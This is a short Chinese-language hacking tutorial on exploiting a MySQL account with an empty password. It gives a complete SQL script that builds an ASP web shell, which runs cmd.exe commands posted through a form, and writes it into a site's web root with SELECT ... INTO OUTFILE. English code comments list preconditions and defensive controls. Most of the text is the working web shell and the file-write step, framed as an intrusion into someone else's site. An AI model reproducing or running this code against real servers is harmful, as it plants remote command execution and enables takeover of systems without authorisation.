利用mysql空密码进行攻击
一天,突然得到一网站的mysql的账号,并查到它的主页所在位置为c:\www\www,首先在网上下载一个cmd.asp程序,然后写一个cmd.sql程序以便进行连接,把cmd.asp上传至它的目录,cmd.sql内容如下:
代码:
-- Assembles an ASP page one line per row in a scratch table, then dumps the
-- table into the web root with SELECT ... INTO OUTFILE. This is the classic
-- "arbitrary file write through MySQL" abuse path. It succeeds only when the
-- database account holds the FILE privilege, secure_file_priv does not confine
-- export to a safe directory, and the OS account running mysqld can write into
-- a directory the web server executes scripts from.
-- Defensive controls: no empty or weak passwords and no remotely reachable
-- root; grant FILE to no application account; set secure_file_priv to NULL
-- (disables file export) or to a dedicated non-web directory; run mysqld under
-- an account with no write access to web roots; alert on INTO OUTFILE /
-- INTO DUMPFILE in the general or audit log and on new script files appearing
-- under web directories.
use test;
-- Scratch table: one row per line of the file being built.
create table tmp(cmd TEXT);
-- Each INSERT below is one verbatim line of the ASP page (a command shell
-- wrapper around WScript.Shell); the rows are written out unchanged by the
-- final SELECT.
insert into tmp values("<%@ Language=VBScript %>");
insert into tmp values("<%");
insert into tmp values("Dim oScript");
insert into tmp values("Dim oScriptNet");
insert into tmp values("Dim oFileSys, oFile");
insert into tmp values("Dim szCMD, szTempFile");
insert into tmp values("On Error Resume Next");
insert into tmp values("' -- create the COM objects that we will be using -- '");
insert into tmp values('Set oScript = Server.CreateObject("WSCRIPT.SHELL")');
insert into tmp values('Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")');
insert into tmp values('Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")');
insert into tmp values("' -- check for a command that we have posted -- '");
insert into tmp values('szCMD = Request.Form(".CMD")');
insert into tmp values('If (szCMD <> "") Then');
insert into tmp values("' -- Use a poor mans pipe ... a temp file -- '");
insert into tmp values('szTempFile = "C:\" & oFileSys.GetTempName( )');
insert into tmp values('Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)');
insert into tmp values('Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)');
insert into tmp values("End If");
insert into tmp values("%>");
insert into tmp values("<HTML>");
insert into tmp values("<BODY>");
insert into tmp values('<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">');
insert into tmp values('<input type=text name=".CMD" size=45 value="<%= szCMD %>">');
insert into tmp values('<input type=submit value="Run">');
insert into tmp values("</FORM>");
insert into tmp values("<PRE>");
insert into tmp values('<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>');
insert into tmp values("<br>");
insert into tmp values("<%");
insert into tmp values("If (IsObject(oFile)) Then");
insert into tmp values("' -- Read the output from our command and remove the temp file -- '");
insert into tmp values("On Error Resume Next");
insert into tmp values("Response.Write Server.HTMLEncode(oFile.ReadAll)");
insert into tmp values("oFile.Close");
insert into tmp values("Call oFileSys.DeleteFile(szTempFile, True)");
insert into tmp values("End If");
insert into tmp values("%>");
insert into tmp values("</BODY>");
insert into tmp values("</HTML>");
-- The file write. Requires the FILE privilege and is refused when
-- secure_file_priv excludes this path; the file is created by the mysqld
-- process, so the OS permissions of that account, not the DB user, decide
-- whether it lands in the web root. This statement is the line to alert on.
select * from tmp into outfile "c:\\www\\www\\234.asp";
-- Removes the staging table; the statements above remain in the binary,
-- general and audit logs, which is where an investigation should look.
drop table tmp;